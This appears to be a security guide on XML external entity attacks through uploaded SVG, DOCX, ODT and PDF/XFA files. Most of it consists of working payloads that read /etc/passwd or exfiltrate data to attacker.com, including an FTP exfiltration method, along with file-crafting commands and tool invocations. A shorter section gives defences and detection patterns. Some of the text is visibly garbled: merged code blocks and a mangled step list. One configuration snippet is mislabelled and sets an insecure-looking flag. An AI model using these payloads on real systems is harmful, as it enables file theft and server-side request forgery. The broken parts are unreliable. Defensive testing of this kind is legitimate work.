XXE via file upload (CWE-611): external entity payloads inside SVG, DOCX, XLSX, or PDF processed server-side — file disclosure without modifying HTTP headers.
TL;DR
File upload XXE exploits applications that accept XML-based file formats and process them server-side with an unprotected XML parser. The attacker's payload is embedded inside the file itself — in SVG markup, inside an OOXML ZIP archive, within a PDF's XFA form data, or in an ODT document XML. The HTTP upload request looks identical to a benign file upload; all attack logic is contained in the file content.
This is one of the most prevalent XXE patterns in modern applications because file upload endpoints exist in virtually every web application: avatar uploaders, document management systems, spreadsheet importers, invoice processors, resume parsers, and content management systems. Each of these features potentially processes XML-based file formats with vulnerable parsers.
OWASP A05:2021 (Security Misconfiguration) applies because the vulnerability is a parser configuration failure: Apache POI, Apache Batik, Apache Tika, and LibreOffice all ship with external entity resolution enabled unless explicitly configured otherwise. CVE-2025-66516 (Apache Tika, CVSS 10.0) is the most recent critical example, introducing a new attack surface for PDF/XFA processing in document ingestion pipelines including AI-powered RAG systems.
The attack sequence for DOCX upload:
unzip clean.docx -d malicious/.word/document.xml (or customXml/item1.xml for CVE-2025-21425 chain).cd malicious && zip -r ../malicious.docx . && cd ...malicious.docx to the target application.<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg width="500" height="100" xmlns="http://www.w3.org/2000/svg">
<text x="10" y="50" font-size="14">&xxe;</text>
</svg>If Apache Batik renders this SVG to PNG, the /etc/passwd contents appear as text in the rendered image. Extract by downloading the generated thumbnail and reading pixel data, or via OOB callback when the application serves the image.
<!-- OOB variant — no response reflection needed -->
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
<!ENTITY % sp SYSTEM "http://attacker.com/exfil.dtd">
%sp;
%param1;
]>
<svg xmlns="http://www.w3.org/2000/svg"/># Step 1: Unpack
unzip clean.docx -d malicious/
# Step 2: Inject into word/document.xml<!-- malicious/word/document.xml -->
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://YOUR-TOKEN.oast.pro/docx-xxe">
]>
<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas"
xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
<w:body><w:p><w:r><w:t>&xxe;</w:t></w:r></w:p></w:body>
</w:document># Step 3: Repack
cd malicious && zip -r ../malicious.docx . && cd ..For the CVE-2025-21425 chain (Office 2024+ hardened document.xml but not customXml):
<!-- malicious/customXml/item1.xml -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamsa 'wrapper'>
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">
%local_dtd; %eval; %error;
]>
<root/>Apache Tika processes XFA (XML Forms Architecture) embedded in PDF files. Tika versions before 3.2.2:
# Create a PDF with embedded XFA containing XXE payload
# Using Python's reportlab + manual XFA injection
from reportlab.pdfgen import canvas
import struct
def create_xxe_pdf(output_path, oast_url):
"""Embed XXE payload in XFA form inside a valid PDF."""
xfa_content = f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "{oast_url}/tika-xfa-xxe">
%xxe;
]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"><template><subform/></template></xdp:xdp>"""
# Embed xfa_content in PDF XFA stream
# [Tool: use tika-xxe-generator or manual PDF construction]Check Tika version before exploitation: curl -s http://tika-server/version | jq .version.
<!-- malicious/content.xml inside malicious.odt ZIP -->
<?xml version="1.0" encoding="UTF-8"?>
<office:document-content xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"
xmlns:xi="http://www.w3.org/2001/XInclude">
<office:body>
<office:text>
<!-- XInclude bypasses DOCTYPE filter in LibreOffice < 25.2.3 -->
<xi:include parse="text" href="file:///etc/passwd"/>
</office:text>
</office:body>
</office:document-content>CVE-2025-66516 — Apache Tika PDF/XFA (CVSS 10.0)
Apache Tika is embedded in enterprise search products, SharePoint integrations, AI RAG pipelines, and document management systems. Any application calling TikaInputStream.get(file) on attacker-uploaded PDFs before Tika 3.2.2 is vulnerable. The attack is especially impactful in automated document pipelines where PDFs are processed without human review.
CVE-2025-21425 — Microsoft Office OOXML Parser (CVSS 7.5)
Microsoft Office 2024 hardened word/document.xml against DOCTYPE-based XXE but left customXml/*.xml files processed by a separate unprotected code path. Patched in January 2025 Patch Tuesday. The attack requires no macros — opening the DOCX triggers automatic processing.
CVE-2025-31200 — LibreOffice ODT XInclude (CVSS 7.1)
LibreOffice blocked DOCTYPE-based XXE but did not disable XInclude processing. An ODT file with xi:include href="file:///etc/passwd" discloses the file when the document is opened or converted. Patched in LibreOffice 25.2.3 and 24.8.7.
HackerOne #1113539 — Rockstar Games XLSX Import (High)
The researcher modified a spreadsheet template to include XXE payloads in the OOXML XML files inside the ZIP. The server-side XLSX processor (Apache POI) resolved the entities and made OOB callbacks. This is representative of the most common file upload XXE vector: server-side document processing for import/export features.
Identify file upload endpoints that process XML-based formats: avatar upload (SVG), document import (DOCX/XLSX), invoice processing (PDF), template upload (ODT).
Craft a benign test file and upload. Check that the endpoint accepts the format.
Inject an OOB XXE canary into the file's XML:
<!ENTITY % xxe SYSTEM "http://YOUR-TOKEN.oast.pro/file-upload-xxe">Monitor Interactsh for callbacks after upload.
Use OXML_XXE to generate test files automatically:
# Install: gem install oxml_xxe
oxml_xxe -f docx -c http://YOUR-TOKEN.oast.pro/
# Generates malicious.docx with OOB XXE payloadFor SVG: submit via every upload endpoint that accepts images, especially avatars and content thumbnails.
OXML_XXE automates payload generation for DOCX, XLSX, PPTX, SVG, and ODT. Combined with an Interactsh token, it provides reliable OOB detection.
Nuclei templates cover CVE-specific file upload XXE (Tika CVE-2025-66516 template available in community templates).
BreachVex tests file-upload endpoints by generating malicious SVG, DOCX, and XLSX files with unique out-of-band callback tokens per content type, then watches for callbacks after each upload and correlates by token.
# Python — validate file contents before processing
import zipfile
import re
def validate_ooxml(file_bytes: bytes) -> None:
"""Scan OOXML ZIP for DOCTYPE/ENTITY declarations before processing."""
with zipfile.ZipFile(file_bytes) as zf:
for name in zf.namelist():
if name.endswith('.xml') or name.endswith('.rels'):
content = zf.read(name).decode('utf-8', errors='replace')
if re.search(r'<!DOCTYPE|<!ENTITY', content, re.IGNORECASE):
raise ValueError(f"DOCTYPE/ENTITY detected in {name} — rejected")// Apache POI — use SAX event model with hardened parser
SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
// For Apache Tika — upgrade to >= 3.2.2 (CVE-2025-66516 patched)
// Tika 3.2.2 disables entity resolution in XFA parser by default<!-- Apache Batik — tika-config.xml to disable entity resolution -->
<properties>
<parsers>
<parser class="org.apache.tika.parser.xml.XMLParser">
<params>
<param name="parseXMLInSecurity" type="boolean">true</param>
</params>
</parser>
</parsers>
</properties>Rejecting files containing <!DOCTYPE patterns is not sufficient for LibreOffice ODT files. CVE-2025-31200 uses XInclude (xi:include) which does not use DOCTYPE. Scan for both <!DOCTYPE and xmlns:xi="http://www.w3.org/2001/XInclude" patterns, and disable XInclude at the parser level separately.
Any file format based on XML is potentially vulnerable: SVG (Scalable Vector Graphics), DOCX/XLSX/PPTX (OOXML — ZIP archives containing XML files), ODT/ODS (LibreOffice OpenDocument — also ZIP+XML), PDF with XFA forms (Adobe's XML-based form format), EPUB, and SAML assertions. The attack requires the application to process the uploaded file with an XML parser that has not disabled external entity resolution.
OOXML formats (DOCX, XLSX, PPTX) are ZIP archives containing XML files. The main document content is in word/document.xml (DOCX) or xl/worksheets/sheet1.xml (XLSX). Apache POI processes these XML files with a SAX or DOM parser. If that parser has entity resolution enabled, injecting <!DOCTYPE> and <!ENTITY> declarations into any of the XML files inside the ZIP triggers XXE when the file is processed server-side. CVE-2025-21425 targets the customXml/item1.xml component specifically.
Apache Batik (versions < 1.14) renders SVG files server-side and processes external entities by default. Apache Batik is used in many Java enterprise applications for SVG-to-PNG/PDF conversion. ImageMagick's SVG handler (via Inkscape delegate) has historical XXE vulnerabilities. Any server-side SVG renderer that does not explicitly disable external entity processing is vulnerable. Modern LibreOffice Export-to-SVG functions also process SVG files with Batik.
Microsoft Office 2024+ hardened the word/document.xml parser but left customXml/*.xml files unprotected. CVE-2025-21425 (CVSS 7.5, January 2025 Patch Tuesday) exploits this: a malicious DOCX contains an XXE payload in customXml/item1.xml rather than word/document.xml. The Office parser processes customXml files with the old unprotected parser. When the victim opens the DOCX, the customXml XML triggers file disclosure (local DTD reuse pattern). No macro required.
Apache Tika (< 3.2.2) processes PDF documents that embed XFA (XML Forms Architecture) forms. XFA is XML inside PDF. When Tika encounters an XFA section, it parses it with an XML parser that had external entity resolution enabled by default. A malicious PDF with an XFA form containing XXE payloads triggers arbitrary file read or SSRF when processed by any application using Tika for document ingestion. CVSS 10.0 — unauthenticated, network-reachable in many deployments.
1. Start with a clean DOCX file. 2. Unzip it: unzip clean.docx -d malicious/. 3. Edit word/document.xml (or malicious/customXml/item1.xml for CVE-2025-21425 chain): add <!DOCTYPE> and <!ENTITY xxe SYSTEM 'http://CANARY.oast.pro/'> declarations, embed &xxe; in the document body. 4. Rezip: cd malicious && zip -r ../malicious.docx . && cd ... 5. Upload to the target application. The server processes the DOCX and resolves the external entity.
Avatar upload endpoints often accept SVG files to support vector graphics profiles. If the server renders the SVG to PNG/JPEG (for display) or extracts metadata using a library like Apache Batik, the SVG XML is processed. An attacker uploads a malicious SVG: <?xml version='1.0' standalone='yes'?><!DOCTYPE svg [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><svg><text>&xxe;</text></svg>. Apache Batik resolves the entity and may include the file content in the rendered image output or error message.
Yes — CVE-2025-31200 (CVSS 7.1) demonstrates XInclude-based file disclosure in LibreOffice ODT files. ODT is an OpenDocument format based on ZIP+XML. LibreOffice rejected DOCTYPE-based XXE but processed XInclude instructions, allowing xi:include href='file:///etc/passwd' to be embedded in the document XML. File content is included when LibreOffice opens or converts the file. Patched in LibreOffice 25.2.3 and 24.8.7.
OXML_XXE (github.com/BuffaloWill/oxml_xxe) — dedicated tool for generating malicious DOCX, XLSX, PPTX, ODT, and SVG files with configurable XXE payloads. It handles the ZIP unpacking, XML injection, and repacking automatically. xxeftp generates FTP-based OOB payloads. For manual crafting: unzip + edit XML + rezip is sufficient. For PDF/XFA: specialized tools or Python's reportlab with XFA injection.
When OOXML XXE targets Java-based document processors (Apache POI on Java), the FTP exfiltration technique works: the entity references ftp://attacker.com:2121/%file; where %file; expands to the target file content. Java's FTP client sends the file content as the FTP username in the USER command, which the xxeftp tool captures. This technique is more reliable than HTTP for Java-based document processors because it handles newlines better than URL parameters.
Use a low-noise approach: 1. Upload a valid SVG/DOCX with no XXE payload to confirm acceptance. 2. Add an internal entity canary (no external fetch): <!ENTITY test 'XXECANARY'>. 3. If the canary is reflected in any response (thumbnail URL, metadata API, processed output), entity expansion is confirmed. 4. Escalate to OOB: add a SYSTEM entity with an Interactsh token — this makes one outbound DNS/HTTP request. 5. Only attempt file read if OOB confirms the parser is vulnerable.